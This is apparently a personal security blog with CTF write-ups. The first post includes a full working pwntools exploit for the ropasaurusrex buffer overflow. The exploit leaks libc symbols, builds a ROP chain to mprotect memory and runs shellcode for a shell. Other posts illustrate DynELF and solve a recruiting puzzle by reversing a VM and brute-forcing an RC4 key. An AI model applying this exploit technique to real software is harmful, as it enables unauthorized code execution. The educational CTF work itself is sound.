Thursday, July 27, 2017

ropasaurusrex

Introduction

A 2013 PlaidCTF challenge was called ropasaurusrex and it was a babys first challenge on Return Oriented Programming. It has been exhaustively documented how to solve this but all solutions I have seen assume that we know the libc that the binary runs under. In the original challenge we were actually given a copy of libc but I don't like that and it is not necessary so my solution works without having a libc copy.

Also other solutions return to system("/bin/sh") or system("cat flag") or whatever which is both boring and limiting. I want shellcode execution!

The binary

The code for the binary is very short:

read_func:
        push   ebp
        mov    ebp,esp
        sub    esp,0x98
        mov    DWORD PTR [esp+0x8],0x100
        lea    eax,[ebp-0x88]
        mov    DWORD PTR [esp+0x4],eax
        mov    DWORD PTR [esp],0x0
        call   read
        leave  
        ret    

main:
        push   ebp
        mov    ebp,esp
        and    esp,0xfffffff0
        sub    esp,0x10
        call   read_func
        mov    DWORD PTR [esp+0x8],0x4
        mov    DWORD PTR [esp+0x4],0x8048510  ; "WIN\n"
        mov    DWORD PTR [esp],0x1
        call   write
        leave  
        ret    

A C version of the above might look like this:

#include <stdio.h>
void read_func(void) {
    char buffer[136];
    read(0, buffer, 256);
}

void main(void) {
    read_func();
    write(1, "WIN\n", 4);
}

The vulnerability should be obvious...write 136 bytes to fill the buffer, the next four bytes will overwrite the saved ebp register and the next four will overwrite the return address.

So we own the return address and since raw bytes are read with read directly there are no bad bytes. We can write anything!

Strategy

So where should we return to?

A technique I use all the time is resolving symbols dynamically which pwntools helps us do using the DynELF class.

DynELF needs an arbitrary read primitive for resolving symbols and we can easily build one using the buffer overflow.

The read primitive takes an address as a parameter and should return at least one byte of data from that address but DynELF for 32 bit binaries usually reads four bytes at a time so if we can return four bytes in one go we should.

Our read primitive will overflow the buffer, overwrite the return address with the address of write@plt (which by the way is at a static address and works the same as returning to write in libc) with the given address as its read address, four as its length and stdout as its file descriptor.

Now to the really clever part...the return address from this call will be read_func itself so we get another go at overflowing the buffer and another read.

We will use this read primitive to resolve the mprotect function in libc and do a last read which will mprotect a section of mapped memory to have readable+writable+executable, read a shellcode into this memory and then return to it. Simple, right?

If you run ropasaurusrex and read its /proc/<pid>/maps file you will see that 0x08049000 is mapped and is writable so we choose this as our destination for shellcode and the address to mprotect.

The exploit

The exploit is quite simple:

#!/usr/bin/env python2

from pwn import *
from time import sleep

context(arch = 'i386', os = 'linux')

r = process('./ropasaurusrex')

SHELLCODE = asm(shellcraft.sh())
RET_OFFSET = 140
READ_FUNC = 0x80483f4
MAIN_ELF = ELF('./ropasaurusrex')
MAPPED_ADDR = 0x08049000

#Read primitive for DynELF
def l(addr):
    AMOUNT_TO_READ = 4
    r.send(flat('A' * RET_OFFSET,          #Offset to return address
                MAIN_ELF.plt['write'],     #Return to write@plt
                READ_FUNC,                 #..back to read_func after write
                1, addr, AMOUNT_TO_READ    #Args to write
                ))
    return r.recv(AMOUNT_TO_READ) #Return the received data

#Resolve mprotect from libc
dynelf = DynELF(l, elf=MAIN_ELF)
mprotect = dynelf.lookup('mprotect', 'libc')

#Build ROP chain for mprotect, read shellcode and jumping to shellcode
rop = ROP(MAIN_ELF)
rop.call(mprotect, (MAPPED_ADDR, len(SHELLCODE), 7))
rop.read(0, MAPPED_ADDR, len(SHELLCODE))
rop.call(MAPPED_ADDR)

#Send ROP chain
r.send(flat('A' * RET_OFFSET, rop.chain()))
#...shellcode must be sent separately
sleep(0.1)
#Send shellcode
r.send(SHELLCODE)
#aaand have a shell
r.interactive()

And it works:

$ ./exploit.py 
[+] Starting local process './ropasaurusrex': Done
[*] '/home/robert/code/ROP/ropasaurusrex'
    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE
[+] Loading from '/home/robert/code/ROP/ropasaurusrex': 0xf7784918
[+] Resolving 'mprotect' in 'libc.so': 0xf7784918
[!] No ELF provided.  Leaking is much faster if you have a copy of the ELF being leaked.
[*] Trying lookup based on Build ID: 94ab3e046784e5da65532a9aded8555c3bdc3778
[*] .gnu.hash/.hash, .strtab and .symtab offsets
[*] Found DT_GNU_HASH at 0xf7731de0
[*] Found DT_STRTAB at 0xf7731de8
[*] Found DT_SYMTAB at 0xf7731df0
[*] .gnu.hash parms
[*] hash chain index
[*] hash chain
[*] Loaded cached gadgets for './ropasaurusrex'
[*] Switching to interactive mode
$ cat flag
Yes, you've got a shell! 

I chose a simple shellcode that only gave me a shell but I could have used a stager and run an advanced multi megabyte payload. Simply returning to system("/bin/sh") would not let us do that.

Monday, June 26, 2017

DynELF illustrated

Introduction

I recently read this blog post about how the DynELF class from pwntools does what it does (which is resolving functions using info leaks).

The blog post does a very nice job describing this complex process but I think a drawing would help in understanding...a picture says more than a thousand words, right?

So I decided to hack up a program that uses the ptrace system call to attach to a process and dump the relevant data structures in dot notation. See it below.

I only dumped details about one loaded library, namely the one called libsmall.so because these structures are quite large so to keep the illustration small this was the compromise.

The code for libsmall.so can be seen here:

#include <stdio.h>

void function_nr_1() {
    printf("function_nr_1\n");
}

void function_nr_2() {
    printf("function_nr_2\n");
}

Since the original post did so well explaining I will not repeat it.

The first linkmap structure points to the main program, the next points to the vDSO. Then comes the libsmall.so followed by libc.so and the linker.

I hope this helps in understanding this exciting topic.

Monday, March 27, 2017

Danish Defence Intelligence Service Hacker academy challenge 2017

Introduction

The DDIS (danish version of NSA) recruits hackers and has an academy for teaching both offensive and defensive techniques. For their 2017 recruiting campaign they posted a puzzle for us to solve and I must say it is one of the best puzzles I have solved.

Here it is:

On the left, x86 machine code, on the right, base64 encoded something.

The text is not OCR friendly. I tried but there were too many errors that I would have to sort out manually, so I wrote a tool to cut out each character and match them up against a table I built up little by little. If no close match was found the tool would show me the character and I would provide the answer which would go into the table. Little by little the tool should get smarter, but it still took forever.

That was when someone told me to focus on the highlighted characters on the right. Put them together you get MzJoYWNrZXI1NTd6amt6aS5vbmlvbgo and base64 decode them you get 32hacker557zjkzi.onion, a dark web address. If you go there (and if it's still up) you find two images linking to two text files:


The emu pointed to a transcript of the assembly code on the left and the disk to a transcript of the base64 encoded stuff on the right.

The assembly code

The assembly shows an incomplete implementation of a virtual machine for executing a 32 bit instruction set. It uses three memory regions named DISK, MEM and REGS.

What IS implemented is a BIOS that reads one 512 byte sector from DISK into MEM:

U5_LE:
;Copy 0x200 (512) bytes from DISK to MEM
mov ecx, 0x200       ; Copy 512 bytes
mov edi, MEM         ; ...to MEM
mov esi, DISK        ; ...from DISK
rep movsb            ; Do it!

...and a fetch/decode/execute cycle that reads one 32 bit instruction, increments the program counter, zeroes a register (MIPS zero register style), decodes and executes the instruction:

SPIN:
mov edx, REG(63)     ; Read 64th entry of REGS table into edx
mov edx, PTR(edx)    ; Read MEM+edx into edx
add WORD REG(63), 4  ; Make 64th entry of REGS table point one entry higher
mov WORD REG(0), 0   ; Zero out first entry of REGS table

; The dword retrieved from MEM into edx works like a small language.
; It consists of an opcode and up to three operands like this:
; [AAAA|ABBB|BBBC|CCCC|CDDD|DDD_|____|____]
; 
; In the following code this happens:
; * The A's are moved into eax
; * The B's are moved into ebp
; * The C's are moved into esi
; * The D's are moved into edi
;
; The A's are then used to look up an instruction in the OP_TABLE, so those five bits are the opcode
; ebp, edi and esi are operands.
;
; REGS is an array of 64 dwords functioning as registers.
; REGS[63] is the program counter
; REGS[0] is initialized to zero before every execute cycle, works kind of like the MIPS zero register

; Move six bits into ebp (the B's)
mov ebp, edx
shr ebp, 21
and ebp, 77o

; Move six bits into esi (the C's)
mov esi, edx
shr esi, 15
and esi, 77o

; Move six bits into edi (the D's)
mov edi, edx
shr edi, 9
and edi, 77o

; Move top five bits into eax (the A's) and use it to look up an opcode in the OP_TABLE
; Jump to that opcode
mov eax, edx
shr eax, 27
mov eax, [OP_TABLE + eax * 4]
jmp eax

The last two instructions above isolates the top five bits and use them to look up the instruction in the OP_TABLE and then jumps to the implemenetation. However, only some of the instructions have been implemented, but it turns out they are enough to let us take an educated guess to how the rest should be implemented. A commented version of the implemented instructions folow:

; OP_LOAD_B = Load Byte (one byte)
; OP_LOAD_H = Load Half Word (two bytes)
; OP_LOAD_W = Load Word (four bytes)

; Load Word
; REGS[B] = MEM[REGS[C] + REGS[D]]
OP_LOAD_W:
mov eax, REG(esi)
add eax, REG(edi)
mov eax, PTR(eax)
mov REG(ebp), eax
jmp SPIN

; REGS[B] = REGS[C] * REGS[D]
OP_MUL:
mov eax, REG(esi)
mul DWORD REG(edi)
mov REG(ebp), eax
jmp SPIN

; REGS[B] = I << S
; [AAAA|ABBB|BBBI|IIII|IIII|IIII|IIIS|SSSS]
OP_MOVI:
mov eax, edx
mov ecx, edx
;Isolate 16 bits stating form sixth
shr eax, 5
and eax, 0xffff
;Isolate lower five bits
and ecx, 37o
shl eax, cl        ; Left shift the 'I' immediate by 'S' bits
mov REG(ebp), eax  ; ..and store them in REGS[B]
jmp SPIN

; if REGS[D] != 0:
;     REGS[B] = REGS[C]
OP_CMOV:
mov eax, REG(edi)
test eax, eax
jz .F
mov eax, REG(esi)
mov REG(ebp), eax
.F:
jmp SPIN

; Write to stdout
; putchar(REGS[B])
OP_OUT:
push DWORD REG(ebp)
call putchar
add esp, 4
jmp SPIN

; Read from DISK into MEM the 512 byte block indexed by the B register to the memory address specified by the D register
; memcpy(MEM + REGS[B], DISK + (REGS[C] * 512), 512)
OP_READ:
mov ecx, 0x200
mov esi, REG(esi)
shl esi, 9
lea esi, [DISK + esi]
mov edi, REG(ebp)
lea edi, PTR(edi)
rep movsb
jmp SPIN

Using them I implemented the rest as I think they should work into my fe_vm.c.

Running my VM implementation on the base64 decoded data shows that it is in fact bytecode for the vm:

We are asked for a password for decrypting something, but I don't know the password. I tried different words from the picture of the disk. Also tried different often used passwords without any luck. Disabling my runtrace output made me able to brute force 20-25 passwords per second so I skipped that idea. I guess I have to reverse engineer the bytecode.

Reversing the bytecode

Before getting into the bytecode (here is my commented disassembly) here are some observations about register usage:

  • r0 = zero register, always contain the value zero
  • r1 = return value from subrouting calls
  • r3 = First arg to subroutine calls
  • r4 = Second arg to subroutine calls
  • r5 = Third arg to subroutine calls
  • r59 = Link register, contains return address from subroutine calls
  • r62 = Stack register
  • r63 = Program counter, points to next instruction to execute

Calling subroutines are done either by ADD or CMOV instructions. ADD is used for unconditional calls and CMOV for conditional ones. Before calling the link register is populated with the address of the instruction following the call and argument registers are populated. For example:

; putstring("OK\n")
030c   MOVI  r3, 0xaf3        ; Address of "OK\n"
0310   MOVI  r57, 0x8         ; Set return address
0314   ADD   r59, r63, r57    ; ...more setting return address
0318   MOVI  r57, 0x870       ; Address of putstring
031c   ADD   r63, r57, r0     ; Call putstring

I did not reverse engineer the entire thing, only the routines I actually needed which are still most of them. I found a routine that simply wasted time by looping 100.000 times and another routine that called that time wasting routine three times. So, that was the reason the decryption was so slow!

I found out that RC4 was used for decrypting data. RC4 is quite easy to recognize so I stopped reversing after I discovered it. The program checked for a correct password by decrypting a 56 byte data section and matching it against the string "Another one got caught today, it's all over the papers.". If that was not the result, the "Bad key" message is printed and the program exits. So, to get to the next level we need to do a known plain text attack against RC4.

Breaking the crypto

RC4 has problems. It is a stream cipher, and the output of a good stream cipher is indistinguishable from random, but if I recall correctly the first 100 or so bytes has a bias toward one bits. This is not gonna help me thou so I go for mounting a brute force attack and crossing my fingers. I lifted both the ciphertext and plaintext from the disk image and coded a progam that searches for a usable key: pta.c

Aaaand it works.

So let's try with our newfound password.

The password is "agent", which is near the top of a dictionary, so we could have solved this by brute forcing the program after all but that would not have been nearly as fun.

The web server

So, the program rewrote itself into a web server and provided us with xinetd configuration for running it. I try that and point my browser towards it but get nothing.

Peeking inside the disk image gets us a couple of probable paths and one of them gives us this:

It says something like "Congratulations, you've solved a puzzle few people could...yada yada yada...get a free t-shirt".

However it also says "PS: Did you find everything?", so apparently there is more to the challenge. I look into the other URLs I found from peeking into the disk image. A few pictures and a couple of documents. Nothing to see thou and no apparent steganography, so what's left is looking into the machine code.

Reverse engineering the web server

I start tracing the web server code and produce a disassembly.

The code is pretty easy to read now that I have gained some experience with it and I quickly identify functions like strcpy, strchr, strcmp and others.

The web server reads a line and splits it in request method, request path and http version. Only GET requests are supported.

Then an odd sequence of checks are made (beginning from line 229 in my commented dissembly).

What happens is that a "secret" path is checked for one character at a time and in a random order making it a little harder to follow. I didn't reverse the entire path because I guessed it eventually.

Following the secret url yields this:

So, apparently I solved it. A pretty well built challenge I must say.